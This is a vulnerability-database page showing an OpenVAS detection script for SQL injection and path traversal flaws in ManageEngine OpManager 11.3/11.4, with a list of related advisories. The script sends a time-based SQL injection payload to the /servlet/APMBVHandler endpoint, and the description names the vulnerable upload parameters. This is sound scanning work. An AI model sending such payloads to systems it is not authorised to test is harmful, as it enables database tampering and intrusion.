Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2014 Greenbone Networks GmbHOPENVAS:1361412562310805103
HistoryNov 24, 2014 - 12:00 a.m.

ManageEngine OpManager Multiple Vulnerabilities Nov14

2014-11-2400:00:00
Copyright (C) 2014 Greenbone Networks GmbH
plugins.openvas.org
14

0.965 High

EPSS

Percentile

99.5%

JSON

This host is installed with ManageEngine
OpManager and is prone to multiple vulnerabilities.

###############################################################################
# OpenVAS Vulnerability Test
#
# ManageEngine OpManager Multiple Vulnerabilities Nov14
#
# Authors:
# Thanga Prakash S <[email protected]>
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

CPE = "cpe:/a:zohocorp:manageengine_opmanager";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.805103");
  script_version("2020-04-15T08:52:55+0000");
  script_cve_id("CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6035");
  script_bugtraq_id(71001, 71002);
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2020-04-15 08:52:55 +0000 (Wed, 15 Apr 2020)");
  script_tag(name:"creation_date", value:"2014-11-24 16:16:10 +0530 (Mon, 24 Nov 2014)");
  script_name("ManageEngine OpManager Multiple Vulnerabilities Nov14");

  script_tag(name:"summary", value:"This host is installed with ManageEngine
  OpManager and is prone to multiple vulnerabilities.");

  script_tag(name:"vuldetect", value:"Send a crafted request via HTTP GET and
  check whether it is able to execute sql query or not.");

  script_tag(name:"insight", value:"Multiple flaws are due to,

  - /servlet/MigrateLEEData script not properly sanitizing user input, specifically path traversal style attacks
  (e.g. '../') supplied via the 'fileName' parameter.

  - /servlet/MigrateCentralData script not properly sanitizing user input, specifically path traversal style attacks
  (e.g. '../') supplied via the 'zipFileName' parameter.

  - /servlet/APMBVHandler script not properly sanitizing user-supplied input to the 'OPM_BVNAME' POST parameter.

  - /servlet/DataComparisonServlet script not properly sanitizing user-supplied input to the 'query' POST
  parameter.");

  script_tag(name:"impact", value:"Successful exploitation will allow attackers to upload arbitrary files and
  execute the script within the file with the privileges of the web server, manipulate SQL queries in the backend
  database, and disclose certain sensitive information.");

  script_tag(name:"affected", value:"ManageEngine OpManager version 11.3/11.4");

  script_tag(name:"solution", value:"Apply the patches from the referenced links");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_app");

  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/35209");
  script_xref(name:"URL", value:"https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix");
  script_xref(name:"URL", value:"https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
  script_family("Web application abuses");
  script_dependencies("gb_manage_engine_opmanager_consolidation.nasl");
  script_mandatory_keys("manageengine/opmanager/http/detected");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

if (!port = get_app_port(cpe: CPE))
  exit(0);

if (!get_app_location(port: port, cpe: CPE))
  exit(0);

data = "OPERATION_TYPE=Delete&OPM_BVNAME=aaa'; SELECT PG_SLEEP(1)--";
url = "/servlet/APMBVHandler";

req = http_post_put_req(port: port, url: url, data: data,
                        add_headers: make_array("Content-Type", "application/x-www-form-urlencoded"));
res = http_keepalive_send_recv(port: port, data: req);

if ("Action=BV_DELETED" >< res && "SELECT PG_SLEEP(1)--" >< res && "Result=Success" >< res &&
    "Result=Failure" >!< res) {
  report = http_report_vuln_url(port: port, url: url);
  security_message(port: port, data: report);
  exit(0);
}

exit(99);

Related

securityvulns 4
zdt 2
packetstorm 2
seebug 1
exploitpack 1
exploitdb 2
dsquare 3
prion 3
cve 3
zdi 6
checkpoint_advisories 3
nessus 2
securityvulns
securityvulns
[The ManageOwnage series, part VIII]: Remote code execution and blind SQLi in OpManager, Social IT and IT360
2014-12-01 00:00:00
[The ManageOwnage Series, part V]: RCE / file upload / arbitrary file deletion in OpManager, Social IT and IT360
2014-10-14 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-12-01 00:00:00
zdt
zdt
ManageEngine OpManager / Social IT Plus / IT360 Multiple Vulnerabilities
2014-11-10 00:00:00
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities
2018-01-26 00:00:00
packetstorm
packetstorm
ManageEngine OpManager / Social IT Plus / IT360 File Upload / SQL Injection
2014-11-09 00:00:00
ManageEngine Code Execution / File Deletion
2014-09-29 00:00:00
seebug
seebug
ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities
2014-11-13 00:00:00
exploitpack
exploitpack
ManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities
2014-11-09 00:00:00
exploitdb
exploitdb
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities
2014-11-10 00:00:00
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities
2014-11-09 00:00:00
dsquare
dsquare
ManageEngine OpManager MigrateCentralData Servlet File Upload
2014-11-30 00:00:00
ManageEngine OpManager MigrateLEEData Servlet File Upload
2014-11-30 00:00:00
ManageEngine OpManager FileCollector Servlet File Upload
2014-11-30 00:00:00
prion
prion
Directory traversal
2014-12-10 18:59:00
Directory traversal
2014-12-04 17:59:00
Sql injection
2014-12-04 17:59:00
cve
cve
CVE-2014-7866
2014-12-10 18:59:00
CVE-2014-6035
2014-12-04 17:59:00
CVE-2014-7868
2014-12-04 17:59:00
zdi
zdi
ManageEngine OpManager MigrateCentralData zipFileName File Upload Remote Code Execution Vulnerability
2015-04-15 00:00:00
ManageEngine OpManager MigrateLEEData fileName File Upload Remote Code Execution Vulnerability
2015-04-15 00:00:00
ManageEngine OpManager AgentDataHandler FILENAME File Upload Remote Code Execution Vulnerability
2015-04-15 00:00:00
checkpoint_advisories
checkpoint_advisories
ManageEngine Multiple Products Multiple Directory Traversal (CVE-2014-7866)
2015-05-11 00:00:00
ManageEngine Multiple Products FileCollector Directory Traversal (CVE-2014-6035)
2014-10-13 00:00:00
ManageEngine Multiple Products Multiple SQL Injections (CVE-2014-7868)
2015-08-10 00:00:00
nessus
nessus
ManageEngine OpManager Multiple Directory Traversal Vulnerabilities
2015-02-16 00:00:00
Zoho ManageEngine OpManager 'OPM_BVNAME' Multiple Vulnerabilities
2015-02-16 00:00:00

0.965 High

EPSS

Percentile

99.5%

JSON
Related for OPENVAS:1361412562310805103
securityvulns4zdt2packetstorm2seebug1exploitpack1exploitdb2dsquare3prion3cve3zdi6checkpoint_advisories3nessus2